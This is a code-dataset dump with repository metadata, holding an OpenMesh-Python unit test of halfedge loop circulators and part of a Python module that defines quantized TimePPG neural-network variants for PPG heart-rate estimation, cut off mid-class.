tests/test_trimesh_circulator_halfedge_loop.py
|
nmaxwell/OpenMesh-Python
|
daa461069decb459f990bfcc1131c55a2db7b5e5
|
[
"BSD-3-Clause"
] | 9
|
2019-09-16T10:03:37.000Z
|
2022-02-03T17:56:24.000Z
|
tests/test_trimesh_circulator_halfedge_loop.py
|
Jiawei1996/OpenMesh-Python
|
daa461069decb459f990bfcc1131c55a2db7b5e5
|
[
"BSD-3-Clause"
] | 2
|
2017-01-04T10:55:17.000Z
|
2017-01-16T16:59:34.000Z
|
tests/test_trimesh_circulator_halfedge_loop.py
|
jjennings955/openmesh-python-subdivide
|
7f39bd1693f009ddd8739c98671b122c4d4aba81
|
[
"BSD-3-Clause"
] | 1
|
2020-04-13T15:23:59.000Z
|
2020-04-13T15:23:59.000Z
|
import unittest
import openmesh
import numpy as np
class TrimeshCirculatorHalfedgeLoop(unittest.TestCase):
def setUp(self):
self.mesh = openmesh.TriMesh()
self.vhandle = []
def test_halfedge_loop_with_face(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(np.array([0, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([1, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([3, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([4, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, -1, 0])))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[5])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
# Test setup:
#
# edge x => halfedge x/x+1
# i.e. edge 0 => halfedge 0/1
#
# 0 --4--- 2 ------ 4
# \ / \ /
# 0 0 2 6 2 /
# \ / 1 \ /
# 1 ---8--- 3
# \ /
# \ 3 /
# \ /
# \ /
# 5
# Circle around face 1
hl_it = self.mesh.hl(self.mesh.halfedge_handle(3))
self.assertEqual(next(hl_it).idx(), 3)
self.assertEqual(next(hl_it).idx(), 6)
self.assertEqual(next(hl_it).idx(), 8)
with self.assertRaises(StopIteration):
next(hl_it)
def test_halfedge_loop_without_face(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(np.array([0, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([1, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([3, 0, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([4, 1, 0])))
self.vhandle.append(self.mesh.add_vertex(np.array([2, -1, 0])))
# Add three faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[5])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
# Test setup:
#
# H => hole (no face)
# fx => face #x
# edge 0 => halfedge 0/1
#
# 0 --4--- 2 -10--- 4
# \ / \ /
# 0 f0 2 6 f2 8
# \ / H \ /
# 1 ---16---3
# \ /
# 12 f3 14
# \ /
# \ /
# 5
# Circle around the hole
hl_it = self.mesh.hl(self.mesh.halfedge_handle(3))
self.assertEqual(next(hl_it).idx(), 3)
self.assertEqual(next(hl_it).idx(), 17)
self.assertEqual(next(hl_it).idx(), 7)
with self.assertRaises(StopIteration):
next(hl_it)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TrimeshCirculatorHalfedgeLoop)
unittest.TextTestRunner(verbosity=2).run(suite)
| 31.867647
| 86
| 0.547993
| 534
| 4,334
| 4.294007
| 0.142322
| 0.183166
| 0.16485
| 0.201483
| 0.811601
| 0.811601
| 0.788923
| 0.753162
| 0.737462
| 0.737462
| 0
| 0.037609
| 0.312875
| 4,334
| 135
| 87
| 32.103704
| 0.732371
| 0.127596
| 0
| 0.774648
| 0
| 0
| 0.002138
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0.042254
| false
| 0
| 0.042254
| 0
| 0.098592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ce2dd68da3d50b98af2b33c46901c305845d73f
| 47,541
|
py
|
Python
|
precision_search/model/TimePPG_variants.py
|
EmbeddedML-EDAGroup/Q-PPG
|
ed42829d0a456db4f0b31d63ba8b22ba483c7b08
|
[
"Apache-2.0"
] | 1
|
2021-12-18T21:04:29.000Z
|
2021-12-18T21:04:29.000Z
|
precision_search/model/TimePPG_variants.py
|
EmbeddedML-EDAGroup/Q-PPG
|
ed42829d0a456db4f0b31d63ba8b22ba483c7b08
|
[
"Apache-2.0"
] | null | null | null |
precision_search/model/TimePPG_variants.py
|
EmbeddedML-EDAGroup/Q-PPG
|
ed42829d0a456db4f0b31d63ba8b22ba483c7b08
|
[
"Apache-2.0"
] | null | null | null |
#*----------------------------------------------------------------------------*
#* Copyright (C) 2021 Politecnico di Torino, Italy *
#* SPDX-License-Identifier: Apache-2.0 *
#* *
#* Licensed under the Apache License, Version 2.0 (the "License"); *
#* you may not use this file except in compliance with the License. *
#* You may obtain a copy of the License at *
#* *
#* http://www.apache.org/licenses/LICENSE-2.0 *
#* *
#* Unless required by applicable law or agreed to in writing, software *
#* distributed under the License is distributed on an "AS IS" BASIS, *
#* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *
#* See the License for the specific language governing permissions and *
#* limitations under the License. *
#* *
#* Author: Alessio Burrello *
#*----------------------------------------------------------------------------*
import torch.nn as nn
import torch.nn.functional as F
from base import BaseModel
from math import ceil
import sys
sys.path.append("..")
from models import quant_module_1d as qm
import json
import torch
__all__ = ['mixTimePPG_big_248_layers', 'mixTimePPG_big_248_multiprec', 'TimePPG_big_quantized_8', 'TimePPG_big_quantized_4', \
'TimePPG_big_quantized_2', 'TimePPG_big_quantized_big', 'TimePPG_big_quantized_medium', 'TimePPG_big_quantized_small', \
'mixTimePPG_medium_248_layers', 'mixTimePPG_medium_248_multiprec', 'TimePPG_medium_quantized_8', 'TimePPG_medium_quantized_4', \
'TimePPG_medium_quantized_2', 'TimePPG_medium_quantized_big', 'TimePPG_medium_quantized_medium', 'TimePPG_medium_quantized_small', \
'mixTimePPG_small_248_layers', 'mixTimePPG_small_248_multiprec', 'TimePPG_small_quantized_8', 'TimePPG_small_quantized_4', \
'TimePPG_small_quantized_2', 'TimePPG_small_quantized_big', 'TimePPG_small_quantized_medium', 'TimePPG_small_quantized_small', \
'TimePPG_big_multiprec_big', 'TimePPG_big_multiprec_medium', 'TimePPG_big_multiprec_small', \
'TimePPG_medium_multiprec_big', 'TimePPG_medium_multiprec_medium', 'TimePPG_medium_multiprec_small', \
'TimePPG_small_multiprec_big', 'TimePPG_small_multiprec_medium', 'TimePPG_small_multiprec_small', \
]
def TimePPG_big_multiprec_big(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_big_248_multiprec3500.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(82)
channels.append(61)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_big_multiprec_medium(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_big_248_multiprec350.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(82)
channels.append(61)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_big_multiprec_small(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_big_248_multiprec35.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(82)
channels.append(61)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_medium_multiprec_big(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_medium_248_multiprec3500.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(45)
channels.append(80)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_medium_multiprec_medium(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_medium_248_multiprec350.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(45)
channels.append(80)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_medium_multiprec_small(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_medium_248_multiprec35.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(45)
channels.append(80)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_small_multiprec_big(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_small_248_multiprec3500.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(28)
channels.append(77)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_small_multiprec_medium(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_small_248_multiprec350.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(28)
channels.append(77)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def TimePPG_small_multiprec_small(**kwargs):
json_file_path = 'mix_archs/architecture_mixTimePPG_small_248_multiprec35.json'
with open(json_file_path, 'r') as j:
contents = json.loads(j.read())
for i,val in enumerate(contents['best_activ']):
if contents['best_activ'][i] == 32:
pass
else:
contents['best_activ'][i] = 2 ** (val+1)
import numpy as np
channels = []
for i,val in enumerate(contents['best_weight']):
ch_layer = []
ch_layer.append(sum(np.asarray(val) == 0)) # 2bits
ch_layer.append(sum(np.asarray(val) == 1)) # 4bits
ch_layer.append(sum(np.asarray(val) == 2)) # 8bits
channels.append(ch_layer)
channels.append(28)
channels.append(77)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
contents['best_activ'].append(8)
return TimePPG_quantized_multiprec(qm.QuantizedChanConv1d, abits = contents['best_activ'], wbits = [32,32,32,32,32,32,32,32,32,32,32,32], channels = channels, **kwargs)
def mixTimePPG_big_248_layers(**kwargs):
return TimePPG(qm.MixActivChanConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], share_weight=True, **kwargs)
def mixTimePPG_big_248_multiprec(**kwargs):
return TimePPG(qm.MultiPrecActivConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], share_weight=True, **kwargs)
def TimePPG_big_quantized_8(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,8,8,8], wbits = [8,8,8,8,8,8,8,8,8,8,8,8], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_4(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [4,4,4,4,4,4,4,4,4,4,4,4], wbits = [4,4,4,4,4,4,4,4,4,4,4,4], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_2(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [2,2,2,2,2,2,2,2,2,2,2,2], wbits = [2,2,2,2,2,2,2,2,2,2,2,2], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_big(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,32,32,32], wbits = [8,8,4,8,8,8,8,4,8,32,32,32], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_medium(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,4,4,4,4,4,4,8,32,32,32], wbits = [8,4,4,4,4,4,4,2,2,32,32,32], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def TimePPG_big_quantized_small(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,4,4,4,4,4,4,2,4,32,32,32], wbits = [4,2,2,2,2,2,2,2,2,32,32,32], channels = [32, 32, 63,64, 64, 121,122, 104, 76,82, 61], **kwargs)
def mixTimePPG_medium_248_layers(**kwargs):
return TimePPG(qm.MixActivChanConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], share_weight=True, **kwargs)
def mixTimePPG_medium_248_multiprec(**kwargs):
return TimePPG(qm.MultiPrecActivConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], share_weight=True, **kwargs)
def TimePPG_medium_quantized_8(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,8,8,8], wbits = [8,8,8,8,8,8,8,8,8,8,8,8], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_4(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [4,4,4,4,4,4,4,4,4,4,4,4], wbits = [4,4,4,4,4,4,4,4,4,4,4,4], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_2(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [2,2,2,2,2,2,2,2,2,2,2,2], wbits = [2,2,2,2,2,2,2,2,2,2,2,2], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_big(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,32,32,32], wbits = [8,8,4,8,8,8,8,4,8,32,32,32], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_medium(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,4,4,4,4,4,4,8,32,32,32], wbits = [8,4,4,4,4,4,4,2,2,32,32,32], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def TimePPG_medium_quantized_small(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,4,4,4,4,4,4,2,4,32,32,32], wbits = [4,2,2,2,2,2,2,2,2,32,32,32], channels = [26, 17, 42, 63, 41, 26, 30, 27, 16, 45, 80], **kwargs)
def mixTimePPG_small_248_layers(**kwargs):
return TimePPG(qm.MixActivChanConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], share_weight=True, **kwargs)
def mixTimePPG_small_248_multiprec(**kwargs):
return TimePPG(qm.MultiPrecActivConv1d, wbits=[2, 4, 8], abits=[2, 4, 8], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], share_weight=True, **kwargs)
def TimePPG_small_quantized_8(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,8,8,8], wbits = [8,8,8,8,8,8,8,8,8,8,8,8], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_4(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [4,4,4,4,4,4,4,4,4,4,4,4], wbits = [4,4,4,4,4,4,4,4,4,4,4,4], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_2(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [2,2,2,2,2,2,2,2,2,2,2,2], wbits = [2,2,2,2,2,2,2,2,2,2,2,2], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_big(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,8,8,8,8,8,8,8,32,32,32], wbits = [8,8,4,8,8,8,8,4,8,32,32,32], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_medium(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,8,4,4,4,4,4,4,8,32,32,32], wbits = [8,4,4,4,4,4,4,2,2,32,32,32], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
def TimePPG_small_quantized_small(**kwargs):
return TimePPG_quantized(qm.QuantizedChanConv1d, abits = [8,4,4,4,4,4,4,2,4,32,32,32], wbits = [4,2,2,2,2,2,2,2,2,32,32,32], channels = [2, 3, 2, 13, 2, 2, 31, 4, 9, 28, 77], **kwargs)
class TimePPG_quantized_multiprec(BaseModel):
"""
TEMPONet architecture:
Three repeated instances of TemporalConvBlock and ConvBlock organized as follows:
- TemporalConvBlock
- ConvBlock
Two instances of Regressor followed by a final Linear layer with a single neuron.
"""
def __init__(self, conv, wbits, abits, channels = 'Not Initialized', share_weight = True, dataset_name='PPG_Dalia', dataset_args={}):
super(TimePPG_quantized_multiprec, self).__init__()
self.conv_func = conv
self.dil = [2, 2, 1, 4, 4, 8, 8]
self.rf = [5, 5, 5, 9, 9,17, 17]
if isinstance(channels, list):
self.ch = channels
else:
print('Missed configuration of channels for TimePPG')
exit(0)
# 1st instance of two TempConvBlocks and ConvBlock
k_tcb00 = ceil(self.rf[0] / self.dil[0])
self.tcb00 = TempConvBlock_multiprec(conv,
ch_in=4,
ch_out=self.ch[0],
k_size=k_tcb00,
dil=self.dil[0],
pad=((k_tcb00 - 1) * self.dil[0] + 1) // 2,
wbits=wbits[0],
abits=abits[0],
share_weight=share_weight,
first_layer = True
)
k_tcb01 = ceil(self.rf[1] / self.dil[1])
self.tcb01 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[0]),
ch_out=self.ch[1],
k_size=k_tcb01,
dil=self.dil[1],
pad=((k_tcb01 - 1) * self.dil[1] + 1) // 2,
wbits=wbits[1],
abits=abits[1],
share_weight=share_weight
)
k_cb0 = ceil(self.rf[2] / self.dil[2])
self.cb0 = ConvBlock_multiprec(conv,
ch_in=sum(self.ch[1]),
ch_out=self.ch[2],
k_size=k_cb0,
strd=1,
pad=((k_cb0 - 1) * self.dil[2] + 1) // 2,
dilation=self.dil[2],
wbits=wbits[2],
abits=abits[2],
share_weight=share_weight
)
# 2nd instance of two TempConvBlocks and ConvBlock
k_tcb10 = ceil(self.rf[3] / self.dil[3])
self.tcb10 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[2]),
ch_out=self.ch[3],
k_size=k_tcb10,
dil=self.dil[3],
pad=((k_tcb10 - 1) * self.dil[3] + 1) // 2,
wbits=wbits[3],
abits=abits[3],
share_weight=share_weight
)
k_tcb11 = ceil(self.rf[4] / self.dil[4])
self.tcb11 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[3]),
ch_out=self.ch[4],
k_size=k_tcb11,
dil=self.dil[4],
pad=((k_tcb11 - 1) * self.dil[4] + 1) // 2,
wbits=wbits[4],
abits=abits[4],
share_weight=share_weight
)
self.cb1 = ConvBlock_multiprec(conv,
ch_in=sum(self.ch[4]),
ch_out=self.ch[5],
k_size=5,
strd=2,
pad=2,
wbits=wbits[5],
abits=abits[5],
share_weight=share_weight
)
# 3td instance of TempConvBlock and ConvBlock
k_tcb20 = ceil(self.rf[5] / self.dil[5])
self.tcb20 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[5]),
ch_out=self.ch[6],
k_size=k_tcb20,
dil=self.dil[5],
pad=((k_tcb20 - 1) * self.dil[5] + 1) // 2,
wbits=wbits[6],
abits=abits[6],
share_weight=share_weight
)
k_tcb21 = ceil(self.rf[6] / self.dil[6])
self.tcb21 = TempConvBlock_multiprec(conv,
ch_in=sum(self.ch[6]),
ch_out=self.ch[7],
k_size=k_tcb21,
dil=self.dil[6],
pad=((k_tcb21 - 1) * self.dil[6] + 1) // 2,
wbits=wbits[7],
abits=abits[7],
share_weight=share_weight
)
self.cb2 = ConvBlock_multiprec(conv,
ch_in=sum(self.ch[7]),
ch_out=self.ch[8],
k_size=5,
strd=4,
pad=4,
wbits=wbits[8],
abits=abits[8],
share_weight=share_weight
)
# 1st instance of regressor
self.regr0 = Regressor(
ft_in=sum(self.ch[8]) * 4,
ft_out=self.ch[9],
wbits=wbits[9],
abits=abits[9]
)
# 2nd instance of regressor
self.regr1 = Regressor(
ft_in=self.ch[9],
ft_out=self.ch[10],
wbits=wbits[10],
abits=abits[10]
)
self.out_neuron = qm.QuantizedLinear(
inplane=self.ch[10],
outplane=1,
wbits=wbits[11],
abits=abits[11]
)
def forward(self, x):
x = self.cb0(self.tcb01(self.tcb00(x)))
x = self.cb1(self.tcb11(self.tcb10(x)))
x = self.cb2(self.tcb21(self.tcb20(x)))
x = x.flatten(1)
x = self.regr0(x)
x = self.regr1(x)
x = self.out_neuron(x)
return x
class TimePPG_quantized(BaseModel):
"""
TEMPONet architecture:
Three repeated instances of TemporalConvBlock and ConvBlock organized as follows:
- TemporalConvBlock
- ConvBlock
Two instances of Regressor followed by a final Linear layer with a single neuron.
"""
def __init__(self, conv, wbits, abits, channels = 'Not Initialized', share_weight = True, dataset_name='PPG_Dalia', dataset_args={}):
super(TimePPG_quantized, self).__init__()
self.conv_func = conv
self.dil = [2, 2, 1, 4, 4, 8, 8]
self.rf = [5, 5, 5,9, 9,17, 17]
if isinstance(channels, list):
self.ch = channels
else:
print('Missed configuration of channels for TimePPG')
exit(0)
# 1st instance of two TempConvBlocks and ConvBlock
k_tcb00 = ceil(self.rf[0] / self.dil[0])
self.tcb00 = TempConvBlock(conv,
ch_in=4,
ch_out=self.ch[0],
k_size=k_tcb00,
dil=self.dil[0],
pad=((k_tcb00 - 1) * self.dil[0] + 1) // 2,
wbits=wbits[0],
abits=abits[0],
share_weight=share_weight,
first_layer = True
)
k_tcb01 = ceil(self.rf[1] / self.dil[1])
self.tcb01 = TempConvBlock(conv,
ch_in=self.ch[0],
ch_out=self.ch[1],
k_size=k_tcb01,
dil=self.dil[1],
pad=((k_tcb01 - 1) * self.dil[1] + 1) // 2,
wbits=wbits[1],
abits=abits[1],
share_weight=share_weight
)
k_cb0 = ceil(self.rf[2] / self.dil[2])
self.cb0 = ConvBlock(conv,
ch_in=self.ch[1],
ch_out=self.ch[2],
k_size=k_cb0,
strd=1,
pad=((k_cb0 - 1) * self.dil[2] + 1) // 2,
dilation=self.dil[2],
wbits=wbits[2],
abits=abits[2],
share_weight=share_weight
)
# 2nd instance of two TempConvBlocks and ConvBlock
k_tcb10 = ceil(self.rf[3] / self.dil[3])
self.tcb10 = TempConvBlock(conv,
ch_in=self.ch[2],
ch_out=self.ch[3],
k_size=k_tcb10,
dil=self.dil[3],
pad=((k_tcb10 - 1) * self.dil[3] + 1) // 2,
wbits=wbits[3],
abits=abits[3],
share_weight=share_weight
)
k_tcb11 = ceil(self.rf[4] / self.dil[4])
self.tcb11 = TempConvBlock(conv,
ch_in=self.ch[3],
ch_out=self.ch[4],
k_size=k_tcb11,
dil=self.dil[4],
pad=((k_tcb11 - 1) * self.dil[4] + 1) // 2,
wbits=wbits[4],
abits=abits[4],
share_weight=share_weight
)
self.cb1 = ConvBlock(conv,
ch_in=self.ch[4],
ch_out=self.ch[5],
k_size=5,
strd=2,
pad=2,
wbits=wbits[5],
abits=abits[5],
share_weight=share_weight
)
# 3td instance of TempConvBlock and ConvBlock
k_tcb20 = ceil(self.rf[5] / self.dil[5])
self.tcb20 = TempConvBlock(conv,
ch_in=self.ch[5],
ch_out=self.ch[6],
k_size=k_tcb20,
dil=self.dil[5],
pad=((k_tcb20 - 1) * self.dil[5] + 1) // 2,
wbits=wbits[6],
abits=abits[6],
share_weight=share_weight
)
k_tcb21 = ceil(self.rf[6] / self.dil[6])
self.tcb21 = TempConvBlock(conv,
ch_in=self.ch[6],
ch_out=self.ch[7],
k_size=k_tcb21,
dil=self.dil[6],
